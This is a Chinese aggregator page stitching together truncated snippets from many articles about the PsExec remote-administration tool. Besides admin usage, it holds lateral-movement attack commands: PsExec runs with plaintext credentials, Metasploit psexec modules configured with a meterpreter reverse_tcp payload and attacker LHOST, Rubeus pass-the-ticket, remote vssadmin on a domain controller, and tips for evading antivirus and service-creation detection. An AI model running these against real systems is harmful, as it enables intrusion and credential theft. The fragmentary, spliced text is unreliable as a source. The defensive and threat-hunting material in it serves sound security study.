Psexec被编写的初衷是为了方便服务器管理员管理大量的机器而开发的,但由于它的便捷,同时也被黑客使用。...psexec工具下载地址: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec cs也直接集成了这款工具 ?...psexec64来横向win2008 ?...\PsExec.exe \\192.168.154.31 -u administrator -p 123456 cmd ? ?...后记 本次研究psexec到这就基本结束了,我自己是没有能力研究出来的,参考了很多大佬的文章,尤其是倾旋大佬,再次感谢!
前言psexec是sysinternals的一款强大的软件,通过它可以提权和执行远程命令,对于批量大范围的远程运维能起到很好的效果,尤其是在域环境下。...正文本文环境:Win10Win Server 2016先模拟一下PsExec的使用。...图片psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后,通过psexec服务运行命令,运行结束后删除服务。...PSExec的使用条件:对方主机开启了 admin共享,如果关闭了admin共享,会提示:找不到网络名如果是工作组环境,则必须使用administrator用户连接,使用普通用户连接会提示:登录失败:
Psexec工具的使用 作者:谢公子 @深蓝攻防实验室 目录 psexec使用前提 工作组环境 域环境 登录域控 以域用户登录域成员主机...以本地用户登录域成员主机 MSF中的psexec模块 Impacket中的psexec.py psexec 是 windows 下非常好的一款远程命令行工具。...psexec.exe依赖于admin共享,而impacket下的psexec.py则依赖于admin或c psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为...然后,通过psexec服务运行命令,运行结束后删除服务。 在使用psexec执行远程命令时,会在目标系统中创建一个psexec服务。命令执行后,psexec服务将会被自动删除。...04 MSF中的psexec模块 END MSF中的psexec,主要讲以下两个: exploit/windows/smb/psexec:该模块生成的payload是exe程序 exploit/windows
PsExec PsExec 主要用于大批量 Windows 主机的维护,在域环境下效果尤其好。...PsExec 的基本原理是:通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘中生成一个名为”PSEXESVC“的二进制文件,然后通过 psexec 服务运行命令,运行结束后删除服务。...PsExec的使用 PsExec的使用 ---- 首先,需要获取目标操作系统的交互式 Shell。...---- Metasploit 使用 PsExec 模块 查找有关 psexec 的模块: search psexec ?...psexec_psh 模块和 psexec 模块的使用方法相同,二者的区别在于,通过 psexec_psh 模块上传的 payload 是 powershell 版本的。
PsExec属于SysInternalSuite (一个windows的内核的套件),是其中一个工具 下载地址: https://technet.microsoft.com/en-us/sysinternals...可以看到有147个小工具 psexec 这个工具可以以System账号执行一个程序 适合于本地提权 psexec -i -s cmd -i 使用交互模式运行程序 -s 使用SYSTEM账号来运行 ?
Psexec Psexec被编写的初衷是为了方便服务器管理员管理大量的机器而开发的,但由于它的便捷,同时也被黑客使用。...psexec工具下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec cs也直接集成了这款工具 Psexec原理分析...环境 win10 :192.168.154.7 win server 2008 X64 :192.168.154.31 假设已经得到win10主机的system权限在cs上通过psexec64来横向win2008...\PsExec.exe \\192.168.154.31 -u administrator -p 123456 cmd 设置过滤规则 ip.src==192.168.154.31 or ip.dst...实现psexec 一.与目标主机建立SMB连接 WNetAddConnection2 DWORD WNetAddConnection2W( LPNETRESOURCEW lpNetResource,
近日,深信服安全团队发现了GlobeImposter2.0勒索病毒新变种,该变种疑似利用微软官网工具PsExec进行内网传播并使用了新的勒索界面。...GlobeImposter2.0最新变种详细分析 在被勒索的主机中,发现勒索时间点生成了PsExec服务以及3个脚本文件: ?...PsExec是微软发布的一个轻量级telnet替代工具,使用者无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。
下载psexechttps://live.sysinternals.com/PsExec.exehttps://live.sysinternals.com/PsExec64.exe下载后放到服务器C:\...Windows\System32目录下然后以Administrator身份在cmd命令行执行psexec.exe -accepteula -nobanner -i -s powershellpsexec.exe...-accepteula -nobanner -i -s cmd或PsExec64.exe -accepteula -nobanner -i -s powershellPsExec64.exe -accepteula...-nobanner -i -s cmdpsexec后面的参数-accepteula -nobanner 是接受协议、隐藏回显头部信息的,可有可无,主要是后面的-is简单记的话就是psexec -is...cmd或psexec -is powershell,执行后会打开一个有system权限(比Administrator权限大)的窗口,在这个窗口里执行你想执行的命令,比如删除某个有权限保护但没啥用的文件夹
由于当前内网是有 VIPRE AV 的,不能使用常规的 Psexec 和 WMI,不然必被拦截!...这个时候我使用我插件里的工具进行 Psexec:(其实有很多工具都可以实现 Bypass AV 横向 psexec 的,我只写了一个(github上的项目),有空再加上去发出来给兄弟们) ? ?
psexec 提权时报错 Error creating key file on ……找不到网络名解决方案:执行net share看有没有如下图的ADMIN$没有的话执行下2句命令reg add "HKEY_LOCAL_MACHINE...CurrentControlSet\Services\LanmanServer\Parameters" /v "AutoShareWks" /t REG_DWORD /d 1 /f执行命令后重启系统就可以了正常执行提权命令了,例如:PsExec64....exe -accepteula -nobanner -i -s powershellPsExec64.exe -accepteula -nobanner -i -s cmd网上还有说使用psexec...2.20版本没有这个报错,说是psexec 2.3*的bug,https://docs.microsoft.com/en-us/answers/questions/522749/psexec-after
本篇将讲到用PsExec.exe这个工具进行远程调用。 1.首次运行PowerShell.exe 双击PowerShell.exe,同意licence条款。 ? 2.查看PowerShell帮助 ?...\PsExec \\$MachineIP -u $DomainUser -p $Password -i 0 -s -w $WorkPath powershell "$WorkPath\Scripts\test.ps1...$Param" 注意: 1.远程机器磁盘上需要有“$WorkPath\Scripts\test.ps1”这个文件; 2.远程机器上不需要有PsExec.exe文件。...\PsExec \\$MachineIP -u $DomainUser -p $Password -h -i 0 -s -w $WorkPath powershell "$WorkPath\Scripts...\PsExec -i -s -w $WorkPath powershell ".\test.ps1" 结果如下图所示: ?
Psexec的设计目的是替代telnet来帮助系统管理员进行远程管理。...进行横向渗透三.利用Psexec进行横向渗透 Psexec最早由Mark Russinovich创建并发布在Sysinternals Suite上,Sysinternals Suite是微软发布的工具程序集...Psexec的设计目的是替代telnet来帮助系统管理员进行远程管理。...通过Psexec的-s参数,可以指定程序以System权限运行。...当建立IPC$连接后,使用Psexec连接目标机器,执行命令Psexec.exe \\192.168.1.3-s cmd.exe,即可与靶标机器建立交互式会话,命令执行结果如图1-5所示。
横向移动 psexec 直接kllist看到当前存在凭证 -accepteula初次打开会出现一堆信息,添加这个命令不会出现一堆信息 PsExec.exe -accepteula \\owa.god.org...cmd PsExec.exe \\owa.god.org -u god\Administrator -p hongrisec@2019: cmd.exe PsExec.exe \\192.168.52.138...) > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > show options set payload...) > set RHOST 192.168.52.141 RHOST => 192.168.52.141 msf5 exploit(windows/smb/psexec) > exploit...执行命令 use auxiliary/admin/smb/psexec_command msf5 auxiliary(admin/smb/psexec_command) > set RHOSTS 192.168.52.138
你还需要确保下列程序已经存储在了跟Gargamel相同的目录之中: 可点击底部【阅读原文】下载 psexec paexec winpmem plink和pscp SharpRDP WMImplant exe...: gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -p nbusr123 -o testResults 其他连接方式 PsExec是其中一种支持的连接方法...,我们可以将—psexec替换为下列选项: —psexec —psrem —rdp —wmi —ssh 我们也可以一次使用多种方法。...比如说,同时使用PsExec和RDP: gargamel.exe -c 192.168.42.47 -u Jano --psexec --rdp -o testResults 获取内存 为了获取内存导转储...(Windows targets only) --psexec Acquire evidence from Windows machine using PsExec
) > use exploit/windows/smb/psexec [*] Using configured payload windows/meterpreter/reverse_tcp msf6...exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter.../reverse_tcp msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.2 lhost => 10.10.10.2 msf6 exploit...(windows/smb/psexec) > set rhost 10.10.10.10 rhost => 10.10.10.10 msf6 exploit(windows/smb/psexec) >...) > set lhost 10.10.10.2 lhost => 10.10.10.2 msf6 exploit(windows/smb/psexec) > set rhost 10.10.10.20
获取登录密码通过cs自带的psexec执行ipc$批量 ? 选中要进行测试的机子 ? 选择对应的凭证 ? 选择会话(补图) ? 等上线就好 ?...生成马子,把马子和PsExec传到出网的机子上,之后用PsExec执行命令 PsExec.exe -accepteula \\192.168.241.171,192.168.241.172 -u Administrator
\PsExec.exe -accepteula \\ cmd 0x05 Pass The Ticket (PTT) 从Linux中获得tickets 检查tickets...\Rubeus.exe ptt /ticket: 使用PsExec在远程计算机中执行cmd : ....\Rubeus.exe ptt /ticket: 使用PsExec在远程计算机中执行cmd : ....\PsExec.exe -accepteula \\ cmd 0x07 Golden ticket 使用 Impacket 示例: # To generate the...\Rubeus.exe ptt /ticket: 使用PsExec在远程计算机中执行cmd : .
PsExec 最强大的用途包括在远程系统上启动交互式命令提示和 IpConfig 等远程启用工具(查看原本无法获取的有关远程系统的信息)。...现有的 PSEXEC 检测方式可以轻松绕过,PSEXEC 服务被创建 - 由 EventID 7045 记录“服务创建”[“ psexec -r spoolsvr ”选项允许绕过这种检测] 由于接受 Eula...(标准的 PsExec 命令(不带 -r 选项)将会安装名为 "PSEXECSVC" 的新服务) 如上所示,使用“ psexec -r spoolsrv \ target -s cmd ”(重命名)选项...如果 PsExec 以某种方式被IT人员使用,那么请尝试以下 AQL 寻找被重命名的 PSEXEC 服务名称: (i.e. psexec -r notPsExecSvc \host -u account.../2019/02/threat-hunting-3-detecting-psexec.html
为了实现上述任务,我们将使用“psexec.exe”,如果我们使用“elevated”选项(通过指定-h)指定目标计算机IP、域管理员用户名及其密码,则可以在远程Windows计算机上执行命令。...psexec文件将远程执行Windows AD域控计算机上的vssadmin命令。...这里,我将这些文件复制到了我转储psexec文件的同一目录下。...使用“psexec”在远程主机上执行命令的常规用法: psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute...Web shell显示psexec正在远程Windows AD域控机器上执行命令。
工作组环境,必须是administrator用户 msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows.../meterpreter/reverse_tcp msf exploit(psexec) > set lhost 192.168.10.27 msf exploit(psexec) > set rhost...域环境,域管理员组内用户即可 msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter.../reverse_tcp msf exploit(psexec) > set lhost 192.168.10.11 msf exploit(psexec) > set rhost 192.168.10.131...msf exploit(psexec) > set smbuser test #test用户在域管理员组内,注意这里不需要写域前缀 msf exploit(psexec) > set smbpass
领取专属 10元无门槛券
手把手带您无忧上云